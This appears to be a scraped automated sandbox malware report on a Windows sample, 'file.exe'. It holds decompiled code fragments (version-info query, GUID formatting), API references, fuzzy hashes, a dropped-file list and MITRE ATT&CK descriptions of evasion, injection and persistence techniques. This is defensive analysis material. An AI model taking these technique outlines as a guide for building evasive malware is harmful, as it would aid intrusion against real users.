				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t20;
				short _t21;
				signed int _t30;
				void* _t32;
				void* _t48;
				short* _t49;
				void* _t51;

				_t49 = _t51 - 0x204;
				_push(0xfffffffe);
				_push(0x411d48);
				_push(E00404AF0);
				_push( *[fs:0x0]);
				_t20 =  *0x413004; // 0x98fc836b
				 *(_t49 - 8) =  *(_t49 - 8) ^ _t20;
				_t21 = _t20 ^ _t49;
				_t49[0x100] = _t21;
				_push(_t21);
				 *[fs:0x0] = _t49 - 0x10;
				 *((intOrPtr*)(_t49 - 0x18)) = _t51 - 0x1f0;
				 *(_t49 - 0x1c) = 0;
				_push(_t49[0x108]);
				_push(_t49[0x106] & 0x0000ffff);
				E004032BD(_t49, 0x100, L"\\StringFileInfo\\%04X%04X\\%s", __ecx & 0x0000ffff);
				 *((intOrPtr*)(_t49 - 4)) = 0;
				 *(_t49 - 0x1c) = VerQueryValueW(__edx, _t49, _t49 - 0x20, _t49 - 0x24);
				 *((intOrPtr*)(_t49 - 4)) = 0xfffffffe;
				asm("sbb eax, eax");
				_t30 =  ~( *(_t49 - 0x1c)) &  *(_t49 - 0x20);
				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0x10));
				_pop(_t48);
				_pop(_t32);
				E0040318A(_t30, _t32, _t49[0x100] ^ _t49, _t48);
				return _t30;
			}

0x00401c31
0x00401c3e
0x00401c40
0x00401c45
0x00401c50
0x00401c54
0x00401c59
0x00401c5c
0x00401c5e
0x00401c67
0x00401c6b
0x00401c71
0x00401c7e
0x00401c81
0x00401c89
0x00401c9c
0x00401ca4
0x00401cb9
0x00401cc7
0x00401cd3
0x00401cd5
0x00401cdb
0x00401ce4
0x00401ce5
0x00401cee
0x00401cfc

APIs

_swprintf.LIBCMT ref: 00401C9C

Part of subcall function 004032BD: __vswprintf_s_l.LIBCMT ref: 004032D0

VerQueryValueW.VERSION(00000000,?,?,?,?,?,98FC836B,?,00000000,00000000,?,?,00404AF0,00411D48,000000FE), ref: 00401CB4

Strings

\StringFileInfo\%04X%04X\%s, xrefs: 00401C8E

Memory Dump Source

Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd

Similarity

API ID: QueryValue__vswprintf_s_l_swprintf
String ID: \StringFileInfo\%04X%04X\%s
API String ID: 4007372565-3176804452
Opcode ID: 2665c408c1388923a7c9a331660d97ad6d30d5893696d7202d0593747b124ff4
Instruction ID: 16fea18b266e5000ac73c5f0c1a7a8be829457a3a8ce474c65f6ca9c4e30ee4f
Opcode Fuzzy Hash: 2665c408c1388923a7c9a331660d97ad6d30d5893696d7202d0593747b124ff4
Instruction Fuzzy Hash: 242169B2940248ABDB20DF95DC45FEE77F8FB48710F10465EF515A7181D6785604CB64

Uniqueness

Uniqueness Score: -1.00%

Function 02B528DA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E02B528DA(short* __ecx, void* __esi) {
				signed int _v8;
				short _v524;
				signed char _v525;
				signed char _v526;
				signed char _v527;
				signed char _v528;
				signed char _v529;
				signed char _v530;
				signed char _v531;
				signed char _v532;
				signed short _v534;
				signed short _v536;
				char _v540;
				signed int _t19;
				short* _t50;
				signed int _t51;

				_t19 =  *0x2b56004; // 0xbb40e64e
				_v8 = _t19 ^ _t51;
				_t50 = __ecx;
				if(__ecx != 0) {
					 *__ecx = 0;
					E02B52CE7(0,  &_v540, 0x10);
					__imp__CoCreateGuid( &_v540);
					E02B52CE7( &_v540,  &_v524, 0x200);
					wsprintfW( &_v524, L"{%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}", _v540, _v536 & 0x0000ffff, _v534 & 0x0000ffff, _v532 & 0x000000ff, _v531 & 0x000000ff, _v530 & 0x000000ff, _v529 & 0x000000ff, _v528 & 0x000000ff, _v527 & 0x000000ff, _v526 & 0x000000ff, _v525 & 0x000000ff);
					E02B52C9C(_t50,  &_v524);
				}
				return E02B53C33(_v8 ^ _t51);
			}

0x02b528e3
0x02b528ea
0x02b528ee
0x02b528f4
0x02b52902
0x02b52905
0x02b52912
0x02b52923
0x02b5298a
0x02b5299b
0x02b529a2
0x02b529b1

APIs

CoCreateGuid.OLE32(?,?), ref: 02B52912
wsprintfW.USER32 ref: 02B5298A

Strings

{%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}, xrefs: 02B52984

Memory Dump Source

Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true

Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd

Similarity

API ID: CreateGuidwsprintf
String ID: {%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}
API String ID: 543765187-891345449
Opcode ID: 1eb3797bb68ba2e66233865266c68aaeb14d14c1f0570a424897be2b9d3c0347
Instruction ID: 1a011aac4c8572908b03cb8673d54d70a0add09e4ee5b6f11c03a671819c2d26
Opcode Fuzzy Hash: 1eb3797bb68ba2e66233865266c68aaeb14d14c1f0570a424897be2b9d3c0347
Instruction Fuzzy Hash: FA117571D443BC6ECB719BA48C18BFAB7BC9F1D201F0405D5B9A9D6142DA388BC49F60

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	API monitoring, MBR, VBR
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
Tactics:	Persistence, Privilege Escalation
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.log

C:\Users\user\AppData\Local\Temp\?????.sys

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Network Behavior

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: file.exePID: 6596, Parent PID: 3528

General

Windows Analysis Report
file.exe